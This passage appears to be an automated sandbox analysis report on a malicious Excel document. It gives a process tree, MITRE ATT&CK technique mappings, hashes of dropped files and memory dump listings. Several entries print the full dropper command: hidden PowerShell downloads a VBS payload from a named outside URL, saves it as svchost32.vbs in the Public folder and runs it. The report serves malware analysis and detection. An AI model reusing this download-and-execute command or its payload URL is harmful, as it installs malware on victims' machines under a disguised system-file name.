      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:4128

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:640

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4824
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:2456

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:4504

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:1716

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:112
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:4724

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:4528

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1008
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/35.vbs','C:\Users\Public\\svchost32.vbs');Start-Process 'C:\Users\Public\\svchost32.vbs'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\svchost32.vbs"
      4⤵
      PID:2032

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:916

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:672

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:816

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2232

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1800

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1948

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4500

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1040

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1344

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\93FC5756-4C51-4EEE-A43D-C85270D1B5EE

Filesize
168KB

MD5
13365f9964fc03675d54c3880cdec0bc

SHA1
2be59e89e3922d66b798f4b7270d3f93956fe118

SHA256
78d551597a81583098407e9327a94be58730e8671af069a2dc8ae0329d38e2ae

SHA512
bd9e71f5408aabb7d1a1c3996b3061d03bbf135814f8bd853c126fe154c305fdd9efbd9aee126ba292b8d31b6cdedb6069d0fc97191e9db29dc74c5b59df3a19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
085ebd119f5fc6b8f63720fac1166ff5

SHA1
af066018aadec31b8e70a124a158736aca897306

SHA256
b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687

SHA512
adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
33eea2792b9fa42f418d9d609f692007

SHA1
48c3916a14ef2d9609ec4d2887a337b973cf8753

SHA256
8f7807c324626abc2d3504638958c148e2e3f3e212261f078940cf4c5f0c4fbb

SHA512
b2dbfcdf2599c38c966c5ebce714a5cd50e2f8b411555acf9f02b31b9c29b8ab53a9afa9d32bab87a06e08f8b2c7818d600773f659a058c8af81c50be7f09b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
81f7ddbfffbcb29fe5a543b3a1e438b8

SHA1
d16b194470fe1404be5d9037fe9bccce3677e58f

SHA256
df476fccec8b974e8f602f490220c3674c6c4babf5d8050db2f75e80ce09d076

SHA512
9a3b6dab440240cc4ce8c5ab7669cc4d14bdb3013da26760411f099c2a59f6daa42a860eec6c6033378a49355e54a50177b68825d8c912286be49976b22fa101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
b00f3f56c104c94e03cd2ad8452c14e7

SHA1
51b78e45015e0d9d62fbdf31b75a22535a107204

SHA256
ba2b669020334ff01a85bfc900ea4371ea557bd315f154875d9bdfdc16ae8b50

SHA512
93e1609be5bbb414c285f37432ce93294c3d1583ef46c7c6c570c122f0b166c34b0ad87de708005c8af97dee27923ba53395a34c2563cdadf3c0a708848b3525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
bb5122013e9da21ebcd7cf8bbfd442d8

SHA1
137dc37b75c41a0edca25bc20dab16729c23d5f5

SHA256
fa311153c8e26e115ed889e986eabf2c6f96123d7a3a7f89102bfa89321342c3

SHA512
6582f6d15a31dcaecc6e6fee0ebb21b6d2278c4b2c1f80580172181d457c47a8be7edb0bc007c701c8a3adc391656ee166a77f49f575539f4f7e5188f5da8a0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
fd39de0268d6a6ad214a2bb8e7d04444

SHA1
8519ccaaf31ba572e6224e052bd555268e7c205d

SHA256
37a1920e52980869d54d3d8affc1a370e9cd947813e51cc4fec909c4ad61a827

SHA512
6afbdfa73e5a3e3c4e593ceef2e1f3940d2ec7a40900c5abbc8bf686889ff5b4d5193bef682e8932a750a79b735569779298868f586a6e271eba8670c7002f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
e1296dfe2cf3638c45f0ccfe213c538e

SHA1
39b2b2ee19a86f9ea0732dc42368a3fcb25862bf

SHA256
45a432329d74d9a88aa6173a3e9bc951b52a0fdc0bf3fa2ebeb6413ef3b627e4

SHA512
2e1973bbc0723a1fdf859e584b46716ca68c184c2cf4292cdf341697cf9edee1321f05dd807d070becafcaff6bbf18c1da6410e3176aea012c20bcd8f532de56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
6f60b13b199ae8351a59df13c18109d5

SHA1
954250bb3d7ac1e34da3434ad30b835ea4ec67d7

SHA256
668b5f3d8e37d0a65dda3e6c9df96c006e6e48640e95378214ded8776fd1030a

SHA512
25a730178a3829e31942e447866c5c26b7d43945149c1b2b82c880fe1aa784b7f2c7815d8b888f117e5e702f6e09c3ae46563b5bf349a4905d3b47970121538a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
3bffff68aa0f4c7c5e62178c0eae2ed7

SHA1
68e5584b0378d2324a11928bed9f15daf75bcc60

SHA256
35ce4dba51f6a2d9b24e5871cc7a4790da008818938d6f42ff0161b5df5b22cb

SHA512
f4e5375b2f3c6a691bf27f6cf7bd48fd6725e2d1c3cd3951287f5361bae689fb45ec3fa0c23190b1ce5ddbb6ad0517df87299fc6cffb402ea3fd1e7ee13b0b05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
91155a1ff9d8fbdb3aecf3b31ffea2bb

SHA1
0611b87e9c9efad5f5d11114f0a256565e8699e9

SHA256
b1ea3af070f885a0c1646d7675127dee945f9fdf1e87616de9d1b296b59f0c94

SHA512
7a754d1d517a512e8ab28bada93800e314dfe4a01b23f4dcc54c7d05fdb30ed6eb7a3376ff5e2cf98899d843a6a79033e7c31334565853c8369d6b7a6ca205e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
7d0b975ee8657a9744cbc8cb9d9a6975

SHA1
f128b56fadecb5ad6c303a58946ec57835dda1f9

SHA256
d583a8b6525c80e46c1e97d7dbc66339c67832dc81da06c964038fa88d11333a

SHA512
b76e74df55e8fbeb978a5c5a9cba1725083382f457b1cdb09af455e29762385baec3e551320351d2e244fb4817f874a957b9e9a18c51ff2476c6212ab77dd4cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
be5dcb0edcd685657291034b68c22c03

SHA1
0ff01f3644e284ff0d6d247de4163a4fde049006

SHA256
9ad948124d7e915b07e617653b21c996eb1a427bc32f677e5d0ae0090c3f59e6

SHA512
74ed63e8adde3d633405784ada779898b0a9f5c6a8fabec528f700a5e36b0ba456c5eefd86f66b7fb7174291ebca53d0b8771808f2e34531b5d29184279f32c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
eb0acadff016c35ed89d3002c8443778

SHA1
a6bab8d4be9a04b70e1d105df338a7541daf065e

SHA256
3c1f19dca89c7e76e04e6bdeb6f1a9d5cd5f2ae75ada3d965198e0d9c9c8d200

SHA512
48c3ffb28e15149ea9272a35e827e52680820d136162221d9063b958d91347650d81ca41be0f0363dd35d32b76c2ab7af860309ea3c25ed8e8eefef959ed9b9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8d80c45e0e047b75073a3d1c2710c68f

SHA1
babc73cf30327b36d184239a2747ec94d48929f4

SHA256
6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

SHA512
5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04a8c09199bb86739f38fbcf9ce30a0f

SHA1
3668880a67ade87c97393bc5b274bd5fffeb31c3

SHA256
c8278d1aa4e3b462b1a70de2c18534ec2d6dc9aff5865f3f37138e5d729d8356

SHA512
3205da818ab1b4dea09c063acecbd862c21428f515dd1dace41135e6c5b5e4b9f2022b33752c605a45d201807709c897960030dc5378a58a6dd1201b6feddcd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f7d6b7f3879853a15d7b33686ce21275

SHA1
bf7a40049fda2a4b3fd5db593655c0c8ace529cd

SHA256
c3206f235e90c65decd21d0bae16dd14ce5859011f75636152792d5e74544803

SHA512
004369b7433d82dc2aa1c1336d30c4ee491b14687302cbd5ae09b367c167a956a9de72a703a8e5c20779750256270201dff25638efd458307c66117c8ca52e67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f1c10b5a8a1723292d7f2497fc0ea413

SHA1
d5008d39de67668cacf974188b9b2a03063a31c5

SHA256
431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73

SHA512
7f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e907cc116209f0a88dc85e1fb7495ca7

SHA1
042e17c8008d6462c1fc0fabc83cca726ca55392

SHA256
34ac8d2850e923fda77e67496a5c634e490efc6edad1a1033cf36aade9dfaeb5

SHA512
2160506cc301dbe1933043fa65f26b413b942f30591f0bbd4bc4fe10032f9141d11833953f91373e29b2f9e0434c876dc6d78a1d2880a36dd212498e6e20f26d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_od3nt3yt.rsn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
677B

MD5
f57463ba724f1205d3729f4edb2a80f8

SHA1
e20071f85841646cdeda639f12ee389c38b4a757

SHA256
2f6a83609007a8445fa7122d0fddd588b72d67c7a742afdb2a2be9d37504cbfd

SHA512
4394924893f255590b27b18fc33e5b9200b03e47b64fa24af76a086fe55427ab8124b46ce79bd5cf50a550865b1cb0663cd206e9f88a0a6c5c5dfad1f7f3815d

Download Submit
C:\Users\Public\svchost32.vbs

Filesize
114B

MD5
e89f75f918dbdcee28604d4e09dd71d7

SHA1
f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

SHA256
6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

SHA512
8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

Download Submit
memory/404-38-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/404-39-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/404-36-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/404-107-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/404-37-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/404-108-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/404-104-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/404-105-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/404-106-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/404-35-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-9-0x00007FFA82260000-0x00007FFA82270000-memory.dmp

Filesize
64KB

Download
memory/1500-12-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-18-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-19-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-22-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-21-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-34-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-0-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/1500-17-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-115-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-11-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-13-0x00007FFA82260000-0x00007FFA82270000-memory.dmp

Filesize
64KB

Download
memory/1500-14-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-16-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-15-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-10-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-6-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-7-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-8-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/1500-5-0x00007FFAC490D000-0x00007FFAC490E000-memory.dmp

Filesize
4KB

Download
memory/1500-4-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/1500-3-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/1500-2-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/1500-1-0x00007FFA848F0000-0x00007FFA84900000-memory.dmp

Filesize
64KB

Download
memory/1500-33-0x00007FFAC4870000-0x00007FFAC4A65000-memory.dmp

Filesize
2.0MB

Download
memory/3152-57-0x000002073CB30000-0x000002073CB52000-memory.dmp

Filesize
136KB

Download